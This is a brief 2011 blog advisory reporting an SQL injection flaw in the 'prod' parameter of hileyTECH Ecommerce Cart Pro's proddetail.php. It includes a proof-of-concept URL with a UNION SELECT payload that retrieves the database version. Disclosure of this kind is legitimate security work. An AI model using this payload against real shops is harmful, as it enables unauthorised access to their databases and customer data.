hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection ~ Random stuff by yappare

Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

on November 14, 2011 in Security, SQLi 1 comment

Title      :    hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor    : http://www.hileytech.com
Links    :    http://www.hileytech.com/cartspec.html
Type   :    Web Application

Parameter 'proddetail.php' in hileyTECH Ecommerce Cart Pro is vulnetable to SQL Injection.
Proof of concept ::

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~

Anonymous said...: nice.; May 25, 2012 at 12:54 AM

Random stuff by yappare

Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

1 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories